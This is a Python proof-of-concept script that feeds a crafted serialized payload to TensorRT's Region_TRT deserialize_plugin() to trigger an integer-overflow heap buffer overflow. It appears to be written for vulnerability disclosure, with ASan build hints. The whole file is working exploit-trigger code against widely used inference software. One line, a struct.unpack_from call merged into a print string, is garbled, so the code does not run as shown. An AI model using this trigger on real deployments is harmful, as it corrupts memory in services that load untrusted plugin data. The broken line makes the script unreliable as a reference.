#!/usr/bin/env python3 """ Trigger TensorRT Region plugin heap overflow via deserialize_plugin(). This script loads a malicious serialized payload and feeds it to RegionPluginCreator.deserialize_plugin(), which internally calls Region::Region(buffer, length) — the vulnerable deserialization constructor. Requirements: - TensorRT Python package (pip install tensorrt) - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source https://github.com/NVIDIA/TensorRT For ASan detection, build the OSS plugins with: cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address" make -j$(nproc) nvinfer_plugin Usage: python3 gen_payload.py # generates malicious_region_payload.bin python3 trigger_deserialize.py # triggers the heap overflow """ import ctypes import struct import sys import os import glob def find_and_load_plugin_lib(): """Try to find and load libnvinfer_plugin.so with OSS plugins.""" search_paths = [ # Built from TensorRT OSS source "TensorRT/build/out/libnvinfer_plugin.so", "/content/TRT/build/out/libnvinfer_plugin.so", # Docker container "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so", ] # Also search LD_LIBRARY_PATH for p in os.environ.get("LD_LIBRARY_PATH", "").split(":"): if p: search_paths.append(os.path.join(p, "libnvinfer_plugin.so")) for path in search_paths: for match in glob.glob(path): if os.path.exists(match): return match return None def main(): payload_file = "malicious_region_payload.bin" if len(sys.argv) > 1: payload_file = sys.argv[1] if not os.path.exists(payload_file): print(f"[-] {payload_file} not found. Run gen_payload.py first.") sys.exit(1) with open(payload_file, "rb") as f: payload = f.read() print(f"[+] Loaded {payload_file}: {len(payload)} bytes") # Load TensorRT try: import tensorrt as trt print(f"[+] TensorRT {trt.__version__}") except ImportError: print("[-] TensorRT Python package not found. Install with: pip install tensorrt") sys.exit(1) # Load OSS plugin library (contains Region_TRT) plugin_path = find_and_load_plugin_lib() if plugin_path: print(f"[+] Loading plugin lib: {plugin_path}") ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL).initLibNvInferPlugins(None, b'') else: print("[!] OSS plugin library not found, trying default registry...") # Find Region_TRT creator region_creator = None for c in trt.get_plugin_registry().all_creators: if c.name == "Region_TRT": region_creator = c break if not region_creator: print("[-] Region_TRT plugin not found in registry.") print(" Build TensorRT OSS plugins first:") print(" git clone https://github.com/NVIDIA/TensorRT.git") print(" cd TensorRT && mkdir build && cd build") print(" cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF") print(" make -j$(nproc) nvinfer_plugin") sys.exit(1) print(f"[+] Region_TRT v{region_creator.plugin_version}") # Parse payload header for display if len(payload) >= 32: C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0) flags = list(payload[24:32]) print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}") print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}") if len(payload) >= 36: n_val = struct.unpack_from("n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})") print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)") print() print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...") print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow") print("[!] Expected: heap-buffer-overflow (visible with ASan)") print() try: bad_plugin = region_creator.deserialize_plugin("region", payload) print(f"[+] Plugin deserialized (returned: {bad_plugin})") print("[!] Without ASan, the heap overflow is silent but corruption has occurred.") print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.") except Exception as e: print(f"[!] Exception during deserialization: {e}") if __name__ == "__main__": main()